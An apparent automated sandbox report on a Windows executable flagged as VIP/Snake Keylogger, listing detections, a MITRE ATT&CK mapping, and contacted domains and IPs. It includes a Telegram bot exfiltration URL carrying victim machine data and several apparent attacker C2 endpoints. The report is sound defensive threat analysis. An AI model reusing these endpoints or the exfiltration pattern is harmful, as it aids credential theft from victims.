Source: Yara match	File source: 00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: M2AB8BeHc4.exe PID: 6520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: M2AB8BeHc4.exe PID: 2720, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 3.2.M2AB8BeHc4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.4478948.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: M2AB8BeHc4.exe PID: 6520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: M2AB8BeHc4.exe PID: 2720, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Security Software Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	1 Input Capture	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
M2AB8BeHc4.exe	34%	ReversingLabs	Win32.Trojan.CrypterX
M2AB8BeHc4.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.fonts.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
http://www.fontbureau.com	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.fontbureau.com/designers/cabarga.htmlN	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://www.fontbureau.com/designers8	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.97.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	158.101.44.242	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/173.254.250.72	false		unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2029/10/2024%20/%2018:30:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot	M2AB8BeHc4.exe, 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com/designers?	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/173.254.250.72$	M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.office.com/lB	M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://o.pki.goog/s/we1/tOE0%	M2AB8BeHc4.exe, 00000003.00000002.4182682038.00000000064A0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.tiro.com	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003CFD000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003D4B000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003D72000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003FC5000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003EA1000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003EEF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.goodfont.co.kr	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=en	M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://varders.kozow.com:8081	M2AB8BeHc4.exe, 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://www.sajatypeworks.com	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003D05000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003CD8000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://c.pki.goog/r/r4.crl0	M2AB8BeHc4.exe, 00000003.00000002.4182682038.00000000064A0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://checkip.dyndns.org/q	M2AB8BeHc4.exe, 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002DDD000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.galapagosdesign.com/DPlease	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://i.pki.goog/r4.crt0	M2AB8BeHc4.exe, 00000003.00000002.4182682038.00000000064A0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.fonts.com	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kr	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	M2AB8BeHc4.exe, 00000000.00000002.1736180528.0000000002B25000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000000.00000002.1740448854.0000000005304000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://i.pki.goog/we1.crt05	M2AB8BeHc4.exe, 00000003.00000002.4182682038.00000000064A0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20a	M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org/xml/	M2AB8BeHc4.exe, 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002C6F000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/	M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002E04000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.apache.org/licenses/LICENSE-2.0	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://c.pki.goog/we1/LTZ9nL9sQRA.crl0	M2AB8BeHc4.exe, 00000003.00000002.4182682038.00000000064A0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://c.pki.goog/r/gsr1.crl0	M2AB8BeHc4.exe, 00000003.00000002.4182682038.00000000064A0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://checkip.dyndns.org	M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003CFD000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003D4B000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003D72000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003FC5000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003EA1000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003EEF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.carterandcone.coml	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://aborters.duckdns.org:8081	M2AB8BeHc4.exe, 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com/designers/cabarga.htmlN	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anotherarmy.dns.army:8081	M2AB8BeHc4.exe, 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://i.pki.goog/gsr1.crt0-	M2AB8BeHc4.exe, 00000003.00000002.4182682038.00000000064A0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.jiyu-kobo.co.jp/	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002C6F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003D05000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003CD8000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	M2AB8BeHc4.exe, 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1544355
Start date and time:	2024-10-29 10:15:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	M2AB8BeHc4.exe renamed because original name is a hash value
Original Sample Name:	cd437678986f11ba11e754bb1153f9a0.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/6@3/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 80 Number of non-executed functions: 16
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target M2AB8BeHc4.exe, PID 2720 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: M2AB8BeHc4.exe

Simulations

Behavior and APIs

Time	Type	Description
05:16:03	API Interceptor	10893504x Sleep call for process: M2AB8BeHc4.exe modified
05:16:05	API Interceptor	31x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Proforma-Invoice#018879TT0100..doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	swift-copy31072024PDF.html	Get hash	malicious	HTMLPhisher	Browse
	Fedex.exe	Get hash	malicious	AgentTesla	Browse
	come.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	Fa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	AWB#21138700102.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	z45paymentadvice.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	rFa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	PbfYaIvR5B.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	na.doc	Get hash	malicious	MassLogger RAT	Browse
188.114.97.3	rPO_28102400.exe	Get hash	malicious	Lokibot	Browse	ghcopz.shop/ClarkB/PWS/fre.php
	PbfYaIvR5B.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
	SR3JZpolPo.exe	Get hash	malicious	JohnWalkerTexasLoader	Browse	xilloolli.com/api.php?status=1&wallets=0&av=1
	5Z1WFRMTOXRH6X21Z8NU8.exe	Get hash	malicious	Unknown	Browse	artvisions-autoinsider.com/8bkjdSdfjCe/index.php
	PO 4800040256.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/4hfb/
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/cDXpxO66/download
	Instruction_1928.pdf.lnk.download.lnk	Get hash	malicious	LummaC	Browse	tech-tribune.shop/pLQvfD4d5/index.php
	WBCDZ4Z3M2667YBDZ5K4.bin.exe	Get hash	malicious	Unknown	Browse	tech-tribune.shop/pLQvfD4d5/index.php
	yGktPvplJn.exe	Get hash	malicious	Pushdo	Browse	www.rs-ag.com/
	https://is.gd/6NgVrQ	Get hash	malicious	HTMLPhisher	Browse	aa.opencompanies.co.uk/vEXJm/
158.101.44.242	z74fBF2ObiS1g87mbS.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	RFQ_List.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	z45paymentadvice.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	dekont_001.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	New_Order_568330_Material_Specifications.exe	Get hash	malicious	AgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWorm	Browse	checkip.dyndns.org/
	g1TLK7mbZD.img	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Bill Of Lading.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	Proforma-Invoice#018879TT0100..doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	dekont_001.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	z74fBF2ObiS1g87mbS.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	come.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	z19UrgentOrder.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Fa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
checkip.dyndns.com	Bill Of Lading.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	Proforma-Invoice#018879TT0100..doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	dekont_001.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	z74fBF2ObiS1g87mbS.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	come.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	z19UrgentOrder.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	Fa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
